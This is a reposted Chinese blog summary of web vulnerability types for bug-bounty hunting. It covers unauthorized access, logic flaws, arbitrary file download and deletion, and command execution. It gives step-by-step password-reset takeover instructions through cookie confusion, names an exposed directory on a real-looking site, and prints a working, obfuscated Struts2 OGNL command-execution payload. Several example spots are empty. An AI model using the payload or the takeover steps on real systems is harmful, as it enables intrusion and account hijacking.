src漏洞类型总结
本文轉載于https://blog.csdn.net/qq_33942040/article/details/111831536
這三類存在漏洞可能更大
越他娘丑的站,越有可能存在洞。 Asp aspx 存在漏洞的可能更大 登陸口沒得驗證碼的可能存在
一,未授權訪問
常見28種服務器或者中間協議未授權訪問
易出現處
①照片訪問類代目錄類處
如烏云實例
在http://learn.open.com.cn/登入
首頁-詳細信息-查看 查看照片地址
發現目錄泄露了
http://oemsresource.open.com.cn/Attachment/ExportTemp/OEMS/PictureTemp/20160711/
② …/ 、 WEB-INF 、 jsp$(jsp結尾)類的文件讀取類(典型過濾該類內容即可實現過濾類)
如
③審計元素代改包內容
二,邏輯漏洞
二具二可
可多開,考慮多開邏輯。
具多量,考慮空邏輯與覆蓋邏輯或者替換邏輯
具數字,考慮溢出邏輯
可簽到類–>可考慮并發邏輯
八種廠商的邏輯漏洞挖掘思路
①cookie混淆–>兩個同時進行找回密碼
(利用原理–>同一個瀏覽器中同時找回兩個賬戶的密碼,即一個瀏覽器找回不同密碼時,兩個賬號的cookie相同導致的)
(驗證碼與cookie綁定而兩賬號此時cookie相同造成了混淆,造成cookie混淆,進而實現越權更改密碼)
實際例子–>烏云1905后臺重置密碼處
注冊個賬號分析下數據包感覺聞到了cookie混淆的味道
使用我的賬號進行正常找回密碼流程獲取驗證碼,停留在輸入驗證碼頁面
這時在同一瀏覽器打開新的網頁,用被害賬號test進行正常找回流程停止輸入手機驗證碼頁面
然后在我的賬號的新密碼頁面輸入新密碼
提交后收到200返回包重置成功,test的密碼被重置了!!
這里是因為驗證碼與cookie綁定而兩賬號此時cookie相同造成了混淆
②cookie處返回了加密的驗證碼
如
③返回密碼的郵箱在前端處
如案例
即改為自己的郵箱即可獲取到相應的驗證碼
三,任意文件下載
典型以downloadFile文件結尾或者其他內容結尾的內容
典型案列
四,任意文件刪除
原因:網站支持input delete等多余協議導致
烏云案例
即支持PUT DELETE協議導致后臺任意文件刪除
五,命令執行漏洞
①支持命令執行類
如下
支持shell命令
執行后即可輸入命令的返回值狀況
②cve或者struts2漏洞執行等漏洞
利用方式:
利用漏洞利用工具直接執行即可
struts2漏洞典型手動利用代碼
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}典型cve
1.)CVE-2014-0160
心臟滴血漏洞
2.)反序列化漏洞
原理:一個序列化的對象轉換為字節的時候,代碼審核不嚴格導致的命令執行漏洞
jboss反序列化教程
java rmi反序列化漏洞–>典型1099端口
六.其余專題
文件泄露專題
xxe漏洞專題
ssrf漏洞專題
任意文件讀取專題
getshell專題
iframe劫持專題
URL重定向專題
xss專題
web特殊漏洞專題
路徑端口工具專題
表達式注入–>即由于表達式引起的命令執行漏洞
典型:即框架接受參數后可執行命令導致
表達式注入
總結
- 上一篇: BBScan:信息泄漏批量扫描脚本
- 下一篇: 渗透测试-验证码的爆破与绕过